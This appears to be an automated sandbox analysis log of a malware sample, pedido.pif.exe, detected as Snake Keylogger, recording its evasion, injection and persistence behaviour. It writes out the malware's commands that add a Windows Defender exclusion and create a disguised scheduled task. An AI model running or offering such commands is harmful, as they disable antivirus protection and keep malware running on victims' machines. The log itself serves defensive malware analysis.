Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -595688s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -595563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -595334s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -595126s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -594656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -594468s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -593985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -593860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -593735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe TID: 3120	Thread sleep time: -593610s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 595856	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 595748	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 595282	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 595157	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 595032	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 594563	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 594426	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 594297	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 594188	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 599727	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 599604	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 599375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 599266	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 599141	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 599031	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 598922	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 597476	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 595334	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 595126	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 593735	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Thread delayed: delay time: 593610	Jump to behavior

Source: pedido.pif.exe, 00000007.00000002.3873589592.0000000000F67000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
Source: RePUtenbQjvc.exe, 0000000C.00000002.3871919880.0000000000E06000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"

Source: C:\Users\user\Desktop\pedido.pif.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\pedido.pif.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\pedido.pif.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\pedido.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe"
Source: C:\Users\user\Desktop\pedido.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\pedido.pif.exe	Memory written: C:\Users\user\Desktop\pedido.pif.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Memory written: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\pedido.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RePUtenbQjvc" /XML "C:\Users\user\AppData\Local\Temp\tmp30EC.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process created: C:\Users\user\Desktop\pedido.pif.exe "C:\Users\user\Desktop\pedido.pif.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RePUtenbQjvc" /XML "C:\Users\user\AppData\Local\Temp\tmp4B59.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Process created: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe "C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe"	Jump to behavior

Source: C:\Users\user\Desktop\pedido.pif.exe	Queries volume information: C:\Users\user\Desktop\pedido.pif.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Queries volume information: C:\Users\user\Desktop\pedido.pif.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Queries volume information: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Queries volume information: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\pedido.pif.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 7.2.pedido.pif.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RePUtenbQjvc.exe.431fca8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RePUtenbQjvc.exe.42ff288.1.unpack, type: UNPACKEDPE
